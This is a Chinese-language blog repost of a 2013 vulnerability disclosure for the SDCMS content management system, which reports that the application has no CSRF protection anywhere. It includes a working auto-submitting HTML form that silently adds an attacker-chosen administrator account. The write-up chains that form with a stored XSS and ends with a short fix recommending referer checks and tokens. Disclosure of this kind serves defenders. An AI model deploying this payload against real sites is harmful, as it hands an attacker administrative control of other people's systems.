记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

SDCMS多处csrf+xss等于管理员

2013-10-18 14:20
SDCMS整个应用都没有防御csrf,结合xss等于管理员了,最新版的也一样

这里主要讲csrf,因为整个应用都没有防御csrf,所以我就挑基础危害较大的吧。
 
1、添加管理员处:
 
然后来添加管理员:
 
抓包,看看添加管理员的请求内容:
然后我们构造好这个添加管理员的表单请求:
 
 

<html>
<body>
<form id="csrf" name="csrf" action="http://x.x.40.6/sdcms/admin/sd_admin.asp?act=adddb" method="POST">
<input type="text" name="t0" value="wooyun" />
<input type="text" name="t1" value="123456" />
<input type="text" name="t2" value="1" />
<input type="text" name="t3" value="0" />
<input type="text" name="t4" value="wooyun" />
<input type="submit" value="submit">
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

 

 
然后把这个csrf.html放到另外一个服务器上x.x.20.199上,利用xss: WooYun: SDCMS某处存储型xss可劫持管理员 
 
 
然后我们来访问这个短消息,并抓个包看看:
 
最后,看看是不是添加上了管理员wooyun:
 

因为真个应用都没有防御csrf,所以还有很多地方都可以利用,例如财务入账,积分入账等 

 
修复方案:

防御csrf,判断referer,加token等 
 
知识来源: www.2cto.com/Article/201310/250745.html

阅读:94549 | 评论:0 | 标签:xss CSRF cms

想收藏或者和大家分享这篇好文章→复制链接地址

“SDCMS多处csrf+xss等于管理员”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云